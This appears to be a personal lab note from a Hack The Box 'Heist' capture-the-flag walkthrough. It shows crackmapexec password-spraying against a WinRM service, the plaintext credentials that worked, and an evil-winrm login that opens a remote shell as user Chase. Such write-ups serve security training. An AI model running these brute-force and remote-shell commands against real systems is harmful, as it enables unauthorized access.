InfoSec LAB

WinRM

WinRM service was revealed during the earlier Nmap scan

crackmapexec

I got 2 system credentials VALIDATED through cme earlier. cme also features brute-forcing against WinRM server I am hoping that one of them is part of the Remote Management Users group

┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ crackmapexec winrm $IP -u users -p passwd --continue-on-success
SMB         10.10.10.149    5985   NONE             [*] None (name:10.10.10.149) (domain:None)
HTTP        10.10.10.149    5985   NONE             [*] http://10.10.10.149:5985/wsman
WINRM       10.10.10.149    5985   NONE             [-] None\administrator:stealth1agent
WINRM       10.10.10.149    5985   NONE             [-] None\administrator:$uperP@ssword
WINRM       10.10.10.149    5985   NONE             [-] None\administrator:Q4)sJu\Y8qz*A3?d
WINRM       10.10.10.149    5985   NONE             [-] None\Hazard:stealth1agent
WINRM       10.10.10.149    5985   NONE             [-] None\Hazard:$uperP@ssword
WINRM       10.10.10.149    5985   NONE             [-] None\Hazard:Q4)sJu\Y8qz*A3?d
WINRM       10.10.10.149    5985   NONE             [-] None\support:stealth1agent
WINRM       10.10.10.149    5985   NONE             [-] None\support:$uperP@ssword
WINRM       10.10.10.149    5985   NONE             [-] None\support:Q4)sJu\Y8qz*A3?d
WINRM       10.10.10.149    5985   NONE             [-] None\Chase:stealth1agent
WINRM       10.10.10.149    5985   NONE             [-] None\Chase:$uperP@ssword
WINRM       10.10.10.149    5985   NONE             [+] None\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)
WINRM       10.10.10.149    5985   NONE             [-] None\Chase:Q4)sJu\Y8qz*A3?d "'NoneType' object has no attribute 'upper'"
WINRM       10.10.10.149    5985   NONE             [-] None\Jason:stealth1agent
WINRM       10.10.10.149    5985   NONE             [-] None\Jason:$uperP@ssword
WINRM       10.10.10.149    5985   NONE             [-] None\Jason:Q4)sJu\Y8qz*A3?d
WINRM       10.10.10.149    5985   NONE             [-] None\rout3r:stealth1agent
WINRM       10.10.10.149    5985   NONE             [-] None\rout3r:$uperP@ssword
WINRM       10.10.10.149    5985   NONE             [-] None\rout3r:Q4)sJu\Y8qz*A3?d
WINRM       10.10.10.149    5985   NONE             [-] None\admin:stealth1agent
WINRM       10.10.10.149    5985   NONE             [-] None\admin:$uperP@ssword
WINRM       10.10.10.149    5985   NONE             [-] None\admin:Q4)sJu\Y8qz*A3?d

The Chaseuser is VALIDATED to be part of the Remote Management Users group This means that I can just connect to target system as the chase user

evil-winrm

┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ evil-winrm -i $IP -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'      
 
Evil-WinRM shell v3.4
 
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
info: Establishing connection to remote endpoint
 
*evil-winrm* ps c:\Users\Chase\Documents> whoami
supportdesk\chase
*evil-winrm* ps c:\Users\Chase\Documents> hostname
SupportDesk
*evil-winrm* ps c:\Users\Chase\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::67
   ipv6 address. . . . . . . . . . . : dead:beef::2d99:5fb6:1477:7b95
   link-local ipv6 address . . . . . : fe80::2d99:5fb6:1477:7b95%15
   ipv4 address. . . . . . . . . . . : 10.10.10.149
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%15
                                       10.10.10.2

Initial Foothold established as theChase user via evil-winrm

InfoSec LAB

Explorer

Heist_WinRM

WinRM

crackmapexec

evil-winrm

Interactive Graph View

Table of Contents

Backlinks